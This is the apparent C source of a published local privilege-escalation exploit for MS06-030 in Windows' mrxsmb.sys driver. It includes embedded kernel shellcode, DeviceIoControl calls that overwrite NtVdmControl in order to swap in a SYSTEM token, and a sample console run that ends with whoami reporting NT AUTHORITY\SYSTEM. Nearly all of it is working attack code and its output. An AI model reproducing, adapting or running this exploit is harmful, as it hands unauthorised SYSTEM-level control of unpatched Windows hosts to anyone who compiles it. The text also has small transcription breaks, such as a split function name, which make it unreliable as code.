/*
MS06-030 Windows Kernel Mrxsmb.sys Local Privilege Escalation Vulnerability Exploit
created by SoBeIt
Main file of exploit
Tested on:
Windows 2000 PRO SP4 Chinese
Windows 2000 PRO SP4 Rollup 1 Chinese
Windows 2000 PRO SP4 English
Windows 2000 PRO SP4 Rollup 1 English
Windows XP PRO SP2 Chinese
Windows XP PRO SP2 English
Usage:ms06-030.exe
*/
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#pragma comment(lib, "psapi.lib")
#define NTSTATUS int
#define ProcessBasicInformation 0
#define SystemModuleInformation 11
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
ZWVDMCONTROL ZwVdmControl;
ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PVOID PebBaseAddress;
ULONG AffinityMask;
ULONG BasePriority;
ULONG UniqueProcessId;
ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknow;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
unsigned char kfunctions[64][64] =
{
//ntoskrnl.exe
{"ZwTerminateProcess"},
{"PsLookupProcessByProcessId"},
{""},
};
unsigned char shellcode[] =
"\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
"\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\xbe\x38\xf0"
"\xdf\xff\x8b\x36\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
"\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
"\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
"\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
"\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
"\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
"\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
"\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
"\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
"\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
"\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
"\xff\x90\x90\x90"
"\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
void ErrorQuit(char *msg)
{
printf("%s:%d\n", msg, GetLastError());
ExitProcess(0);
}
ULONG RVA2Offset(ULONG RVA, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
{
ULONG i;
if(RVA < pSectionHeader[0].PointerToRawData)
return RVA;
for(i = 0; i < Sections; i++)
{
if(RVA >= pSectionHeader[i].VirtualAddress &&
RVA < pSectionHeader[i].VirtualAddress + pSectionHeader[i].SizeOfRawData)
return (RVA - pSectionHeader[i].VirtualAddress + pSectionHeader[i].PointerToRawData);
}
return 0;
}
ULONG Offset2RVA(ULONG Offset, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
{
ULONG i;
if(Offset < pSectionHeader[0].PointerToRawData)
return Offset;
for(i = 0; i < Sections; i++)
{
if(Offset >= pSectionHeader[i].PointerToRawData &&
Offset < pSectionHeader[i].PointerToRawData + pSectionHeader[i].SizeOfRawData)
return (Offset - pSectionHeader[i].PointerToRawData + pSectionHeader[i].VirtualAddress);
}
return 0;
}
void GetFunction()
{
HANDLE hNtdll;
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
ErrorQuit("LoadLibrary failed.\n");
ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
if(ZwVdmControl == NULL)
ErrorQuit("GetProcAddress failed.\n");
ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
if(ZwQueryInformationProcess == NULL)
ErrorQuit("GetProcAddress failed.\n");
ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if(ZwQuerySystemInformation == NULL)
ErrorQuit("GetProcessAddress failed.\n");
FreeLibrary(hNtdll);
}
ULONG ComputeHash(char *ch)
{
ULONG ret = 0;
while(*ch)
{
ret = ((ret << 25) | (ret >> 7)) + *ch++;
}
return ret;
}
ULONG GetKernelBase()
{
ULONG i, Byte, ModuleCount;
PVOID pBuffer;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
PCHAR pName;
ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
if((pBuffer = malloc(Byte)) == NULL)
ErrorQuit("malloc failed.\n");
if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
ErrorQuit("ZwQuerySystemInformation failed\n");
ModuleCount = *(PULONG)pBuffer;
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
for(i = 0; i < ModuleCount; i++)
{
if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
{
free(pBuffer);
return (ULONG)pSystemModuleInformation->Base;
}
pSystemModuleInformation++;
}
free(pBuffer);
return 0;
}
int main(int argc, char *argv[])
{
PVOID pDrivers[256];
PULONG pStoreBuffer, pNamesArray, pFunctionsArray, pShellcode;
PUCHAR pRestoreBuffer, pBase;
PCHAR pName;
PUSHORT pOrdinals;
PIMAGE_NT_HEADERS pHeader;
PIMAGE_EXPORT_DIRECTORY pExport;
PIMAGE_SECTION_HEADER pSectionHeader;
PROCESS_BASIC_INFORMATION pbi;
SYSTEM_MODULE_INFORMATION smi;
OSVERSIONINFO ovi;
char DriverName[256];
ULONG Byte, FileSize, len, i, j, k, BaseAddress, Value, KernelBase, buf[64], HookAddress, SystemId, TokenOffset, Sections;
USHORT index;
HANDLE hDevice, hFile;
printf("\n MS06-030 Windows Kernel Mrxsmb.sys Local Privilege Escalation Vulnerability Exploit \n\n");
printf("\t
create by SoBeIt. \n\n");
if(argc != 1)
{
printf(" Usage:%s \n\n", argv[0]);
return 1;
}
GetFunction();
if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
ErrorQuit("ZwQueryInformationProcess failed\n");
KernelBase = GetKernelBase();
if(!KernelBase)
ErrorQuit("Unable to get kernel base address.\n");
printf("Kernel base address: %x\n", KernelBase);
ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(!GetVersionEx(&ovi))
ErrorQuit("GetVersionEx failed.\n");
if(ovi.dwMajorVersion != 5)
ErrorQuit("Not Windows NT family OS.\n");
printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
switch(ovi.dwMinorVersion)
{
case 0: //Windows2000
SystemId = 8;
TokenOffset = 0x12c;
break;
case 1: //WindowsXP
SystemId = 4;
TokenOffset = 0xc8;
break;
case 2: //Windows2003
SystemId = 4;
TokenOffset = 0xc8;
break;
default:
SystemId = 8;
TokenOffset = 0xc8;
}
pRestoreBuffer = malloc(0x100);
if(pRestoreBuffer == NULL)
ErrorQuit("malloc failed.\n");
if(!EnumDeviceDrivers(pDrivers, sizeof(pDrivers), &Byte))
ErrorQuit("EnumDeviceDrivers failed.\n");
for(i = 0; i < (Byte / sizeof(PVOID)); i++)
{
if(!GetDeviceDriverBaseName(pDrivers[i], DriverName, sizeof(DriverName)))
ErrorQuit("GetDeviceDriverBaseName failed.\n");
if(!strnicmp(DriverName, "mrxsmb.sys", 10))
{
BaseAddress = (ULONG)pDrivers[i];
printf("Mrxsmb.sys Base Address:%x\n", BaseAddress);
break;
}
}
if(!BaseAddress)
ErrorQuit("No address of mrxsmb.sys has been found.\n");
pStoreBuffer = (PULONG)VirtualAlloc(NULL, 0x1001000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(pStoreBuffer == NULL)
ErrorQuit("VirtualAlloc failed.\n");
printf("Allocated address:%x\n", pStoreBuffer);
// \device\LanmanRedirector
hDevice = createFile("\\\\.\\Shadow", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
ErrorQuit("createFile failed.\n");
if(!GetSystemDirectory((PUCHAR)pStoreBuffer, 256))
ErrorQuit("GetSystemDirectory failed.\n");
strcat((PUCHAR)pStoreBuffer, "\\ntoskrnl.exe");
hFile = createFile((PUCHAR)pStoreBuffer, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile == INVALID_HANDLE_VALUE)
{
hFile = createFile("ntoskrnl.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile == INVALID_HANDLE_VALUE)
ErrorQuit("createFile failed.\n");
}
if((FileSize = GetFileSize(hFile, NULL)) == 0xffffffff)
ErrorQuit("GetFileSize failed.\n");
printf("File size:%x\n", FileSize);
pBase = (PUCHAR)VirtualAlloc(NULL, FileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(pBase == NULL)
ErrorQuit("VirtualAlloc failed.\n");
if(!ReadFile(hFile, pBase, FileSize, &Byte, NULL))
ErrorQuit("ReadFile failed.\n");
pHeader = (PIMAGE_NT_HEADERS)(pBase + ((PIMAGE_DOS_HEADER)pBase)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((PUCHAR)(&pHeader->OptionalHeader) + pHeader->FileHeader.SizeOfOptionalHeader);
Sections= pHeader->FileHeader.NumberOfSections;
pExport = (PIMAGE_EXPORT_DIRECTORY)(pBase +
RVA2Offset(pHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress,
pSectionHeader,
Sections
));
pNamesArray = (PULONG)(pBase +
RVA2Offset(pExport->AddressOfNames,
pSectionHeader,
Sections));
pFunctionsArray = (PULONG)(pBase +
RVA2Offset(pExport->AddressOfFunctions,
pSectionHeader,
Sections));
pOrdinals = (PUSHORT)(pBase +
RVA2Offset(pExport->AddressOfNameOrdinals,
pSectionHeader,
Sections));
len = strlen("NtVdmControl");
for(i = 0; i < pExport->NumberOfNames; i++)
{
pName = pBase + RVA2Offset(pNamesArray[i], pSectionHeader, Sections);
if(!strncmp(pName, "NtVdmControl", len))
break;
}
if(i > pExport->NumberOfFunctions)
ErrorQuit("Some error occured.\n");
index = pOrdinals[i];
HookAddress = pFunctionsArray[index] + KernelBase;
printf("%s Address:%x\n", pName, HookAddress);
memcpy(pRestoreBuffer, pBase + pFunctionsArray[index], 0x20);
pShellcode = (PULONG)shellcode;
for(k = 0; pShellcode[k++] != 0x90cccc90; )
;
for(j = 0; kfunctions[j][0] != '\x0'; j++)
buf[j] = ComputeHash(kfunctions[j]);
buf[j++] = pbi.InheritedFromUniqueProcessId;
buf[j++] = SystemId;
buf[j++] = (ULONG)pRestoreBuffer;
buf[j++] = HookAddress;
buf[j++] = 0x20;
buf[j++] = TokenOffset;
memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
hDevice = createFile("\\\\.\\Shadow", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
ErrorQuit("createFile failed.\n");
Value = (0xe9 << 8) & 0xff00;
printf("Need value: %x\n", Value);
while((pStoreBuffer[3] & 0xff00) != Value)
{
memset(pStoreBuffer, 0, 0x18);
if(!DeviceIoControl(hDevice, 0x141043, pStoreBuffer, 0x2, pStoreBuffer, 0x18, &Byte, NULL))
ErrorQuit("DeviceIoControl failed.\n");
printf("\rValue:%x", pStoreBuffer[3]);
}
printf("\n");
memset(pStoreBuffer, 0, 0x18);
if(!DeviceIoControl(hDevice, 0x141043, pStoreBuffer, 0x2, (PVOID)(HookAddress - 0xC - 1), 0x18, &Byte, NULL))
ErrorQuit("DeviceIoControl failed.\n");
Value = (((ULONG)pStoreBuffer + 0x800000 - HookAddress) >> 16) & 0xfff0;
printf("Need value: %x\n", Value);
while((pStoreBuffer[3] & 0xfff0) != Value)
{
memset(pStoreBuffer, 0, 0x18);
if(!DeviceIoControl(hDevice, 0x141043, pStoreBuffer, 0x2, pStoreBuffer, 0x18, &Byte, NULL))
ErrorQuit("DeviceIoControl failed.\n");
printf("\rValue:%x", pStoreBuffer[3]);
}
printf("\n");
if(!DeviceIoControl(hDevice, 0x141043, pStoreBuffer, 0x2, (PVOID)(HookAddress - 0xC + 3), 0x18, &Byte, NULL))
ErrorQu
it("DeviceIoControl failed.\n");
memset(pStoreBuffer, 0x90, 0x1001000);
memcpy((PUCHAR)pStoreBuffer + 0x1000000, shellcode, sizeof(shellcode));
CloseHandle(hDevice);
CloseHandle(hFile);
printf("Exploitation finished.\n");
ZwVdmControl(0, NULL);
return 1;
}
Usage:
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\>ms06-030
MS06-030 Windows Kernel Mrxsmb.sys Local Privilege Escalation Vulnerability Exp
loit
create by SoBeIt.
Kernel base address: 804d8000
Major Version:5 Minor Version:1
Mrxsmb.sys Base Address:f596e000
Allocated address:420000
File size:214600
NtVdmControl Address:805bab48
Need value: e900
Value:e900
Need value: 8060
Value:18060
Exploitation finished.
C:\>whoami
NT AUTHORITY\SYSTEM
C:\>
近期评论